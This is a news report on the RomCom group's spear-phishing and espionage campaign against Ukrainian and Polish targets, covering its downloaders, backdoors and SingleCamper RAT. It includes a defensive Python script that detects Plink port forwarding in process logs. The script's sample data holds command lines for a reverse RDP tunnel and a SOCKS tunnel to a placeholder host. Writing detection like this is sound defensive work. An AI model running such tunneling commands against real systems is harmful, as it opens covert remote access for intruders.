Russian Threat Actor RomCom Targets Ukrainian and Polish Entities with Advanced Cyber Attacks

The Russian cybercriminal group RomCom has launched a new wave of cyberattacks against Ukrainian government agencies and unidentified Polish entities since late 2023. These attacks feature a modified version of the RomCom RAT, called SingleCamper (also known as SnipBot or RomCom 5.0), according to a report by Cisco Talos, which is monitoring the activity under the code name UAT-5647.

RomCom, also tracked as Storm-0978, Tropical Scorpius, UAC-0180, UNC2596, and Void Rabisu, has been involved in ransomware, extortion, and targeted credential theft since its emergence in 2022. Recent activities show an increased operational tempo with a clear espionage agenda, aiming to set up long-term access to compromised networks and steal sensitive data.

The attacks begin with spear-phishing emails that deliver downloaders written in C++ (MeltingClaw) or Rust (RustyClaw), which install backdoors like ShadyHammock and DustyHammock. These backdoors enable remote control, command execution, and data exfiltration. SingleCamper, the latest RomCom RAT version, conducts various post-compromise tasks such as network reconnaissance, lateral movement, and remote tunneling using PuTTY’s Plink tool.
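Defenders can hunt for the Plink tunneling described above in process-creation telemetry. The sketch below is an added example, not code from the Cisco Talos report or this article: the event fields (`host`, `cmdline`), host names and command lines are constructed, and matching on Plink's documented forwarding options (`-L`, `-R`, `-D`) rather than on the file name alone is an assumption made so that a renamed binary is still reported.

```python
import re

# Forwarding options documented for Plink and the argument shape each one takes.
FULL = re.compile(r"^(?:[\w.*-]+:)?\d{1,5}:[\w.-]+:\d{1,5}$")  # [ip:]port:host:port
DYN = re.compile(r"^(?:[\w.*-]+:)?\d{1,5}$")                    # [ip:]port
FORWARD = {"-L": ("local", FULL), "-R": ("remote", FULL), "-D": ("dynamic", DYN)}
# Image name check, used only to annotate an alert (a renamed copy will not match).
PLINK_RE = re.compile(r'(?i)(?:^|[\\/"\s])plink(?:\.exe)?(?=["\s]|$)')

def find_forwards(cmdline):
    """Return (kind, spec) for every forwarding option followed by a valid spec."""
    tokens = cmdline.split()
    hits = []
    for flag, arg in zip(tokens, tokens[1:]):
        if flag in FORWARD:  # case-sensitive on purpose: -l is the login name
            kind, shape = FORWARD[flag]
            if shape.match(arg.strip('"')):
                hits.append((kind, arg.strip('"')))
    return hits

def triage(events):
    """Keep only events whose command line sets up a port forward."""
    alerts = []
    for ev in events:
        forwards = find_forwards(ev["cmdline"])
        if forwards:
            alerts.append({"host": ev["host"],
                           "plink_name": bool(PLINK_RE.search(ev["cmdline"])),
                           "forwards": forwards})
    return alerts

# Constructed sample events (hypothetical hosts, paths and destinations).
SAMPLE_EVENTS = [
    {"host": "WS-01", "cmdline": r'"C:\Users\Public\plink.exe" -ssh -batch -N '
                                 r'-R 13389:127.0.0.1:3389 user@tunnel.example -P 443'},
    {"host": "WS-02", "cmdline": r'C:\ProgramData\svc_update.exe -N -D 1080 user@tunnel.example'},
    {"host": "BLD-01", "cmdline": 'plink.exe -ssh -l admin -P 22 build01.example "uname -a"'},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

An alert with `plink_name` set to false is not automatically benign or malicious: OpenSSH clients accept the same three options, so the result needs the parent process, signer and destination for context.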

The campaign’s goal appears twofold: maintaining long-term espionage access to steal critical information, and potentially deploying ransomware for financial gain. Researchers believe Polish entities may also have been targeted, an assessment based on the malware’s ability to check keyboard language settings.
